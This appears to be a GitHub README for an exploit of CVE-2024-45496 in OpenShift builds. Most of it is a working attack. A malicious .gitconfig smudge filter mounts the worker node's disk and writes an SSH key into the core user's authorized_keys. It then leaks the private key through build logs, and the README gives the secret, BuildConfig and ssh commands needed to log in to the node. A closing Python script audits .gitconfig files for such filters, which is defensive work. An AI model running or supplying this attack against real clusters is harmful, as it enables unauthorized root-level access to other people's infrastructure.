pwnc4t/cve-2024-45496
Clone the repository containing the required files:

git clone https://github.com/pwnc4t/cve-2024-45496.git
cd cve-2024-45496

The repository contains a Dockerfile and a .gitattributes file that maps the Dockerfile to a filter named "dockerfile".

Create a malicious git config file with the exploit payload:

# .gitconfig
[safe]
    directory = *
[filter "dockerfile"]
    smudge = "mkdir -p /mnt/h && mount /dev/vda4 /mnt/h && ssh-keygen -t ed25519 -f /tmp/k -N '' -q && mkdir -p /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh && cat /tmp/k.pub >> /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys && chmod 600 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys && chown 1000:1000 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys 2>&1 >/dev/null; cat; echo; cat /tmp/k | while IFS= read -r line; do echo \"RUN echo '$line'\"; done"
    required = true

The smudge filter executes during git checkout when the Dockerfile is processed. It mounts the host filesystem, generates an SSH keypair, appends the public key to the host's authorized_keys, and embeds the private key into the Dockerfile as RUN commands so it can be extracted from the build logs.

Create a secret from the .gitconfig file:

oc create secret generic malicious-secret --from-file=.gitconfig

The secret is mounted as the git configuration during the clone operation, so git uses the malicious filter when checking out files.

Create a BuildConfig that uses the malicious git configuration:

# malicious-buildconfig.yaml
apiVersion: build.openshift.io/v1
kind: BuildConfig
metadata:
  name: malicious-buildconfig
spec:
  source:
    type: Git
    git:
      uri: 'https://github.com/pwnc4t/cve-2024-45496.git'
    sourceSecret:
      name: malicious-secret
  strategy:
    type: Docker
    dockerStrategy:
      dockerfilePath: Dockerfile

The sourceSecret injects the malicious .gitconfig into the git-clone container. During the clone, git reads .gitattributes, sees the filter mapping, and executes the smudge command when checking out the Dockerfile.

Apply the build configuration:

oc apply -f malicious-buildconfig.yaml

Start the build and follow the logs to extract the SSH private key:

oc start-build malicious-buildconfig --follow

The build logs show the SSH private key line by line as the RUN echo commands execute. The key appears because the smudge filter embedded it into the Dockerfile during checkout.

Save the private key from the build logs to a file (exploit_key below), set correct permissions, and establish an SSH connection to the worker node:

chmod 600 exploit_key
ssh -i exploit_key core@WORKER_IP
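As an added defensive check, not part of this repository: a small Python audit that flattens a .gitconfig (as it would be stored in a Secret referenced by a BuildConfig's sourceSecret) and flags the settings this technique relies on, a filter command that git runs at checkout and the wildcard safe.directory. It also flags core.sshCommand and core.hooksPath, two other keys whose values git executes; the sample config below is constructed and uses a harmless command.

```python
import re
from typing import List, Tuple

# Under [filter "<name>"], these keys are commands git runs during checkout/add.
FILTER_COMMAND_KEYS = {"smudge", "clean", "process"}
# Other keys whose values git executes as commands (lower-cased dotted form).
EXECUTED_KEYS = {"core.sshcommand", "core.hookspath"}

SECTION_RE = re.compile(r'^\[([A-Za-z0-9.-]+)(?:\s+"((?:[^"\\]|\\.)*)")?\]\s*$')
KEY_RE = re.compile(r'^([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*)$')

def parse_gitconfig(text: str) -> List[Tuple[str, str]]:
    """Flatten git config text into (section.subsection.key, value) pairs.
    Section and key names are case-insensitive in git; subsections keep case."""
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            name, sub = m.group(1).lower(), m.group(2)
            section = f"{name}.{sub}" if sub is not None else name
            continue
        m = KEY_RE.match(line)
        if m and section is not None:
            value = m.group(2).strip()
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1]          # drop surrounding quotes
            entries.append((f"{section}.{m.group(1).lower()}", value))
    return entries

def audit_gitconfig(text: str) -> List[str]:
    """Return one finding per setting that lets a mounted .gitconfig run code."""
    findings = []
    for key, value in parse_gitconfig(text):
        parts = key.split(".")
        if parts[0] == "filter" and parts[-1] in FILTER_COMMAND_KEYS:
            findings.append(f"{key}: filter command runs at checkout: {value[:60]}")
        elif key == "safe.directory" and value == "*":
            findings.append(f"{key}: wildcard disables repository ownership checks")
        elif key in EXECUTED_KEYS:
            findings.append(f"{key}: git executes this value: {value[:60]}")
    return findings

# Constructed sample with the shape of the config above, but a benign command.
SAMPLE_GITCONFIG = """\
[safe]
    directory = *
[filter "dockerfile"]
    smudge = "echo smudged; cat"
    required = true
[user]
    name = builder
"""

if __name__ == "__main__":
    for finding in audit_gitconfig(SAMPLE_GITCONFIG):
        print(finding)
```

Feed it the decoded .gitconfig key of every Secret a BuildConfig names in spec.source.sourceSecret; any finding means the clone step can execute attacker-chosen commands.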

About

openshift privilege escalation exploit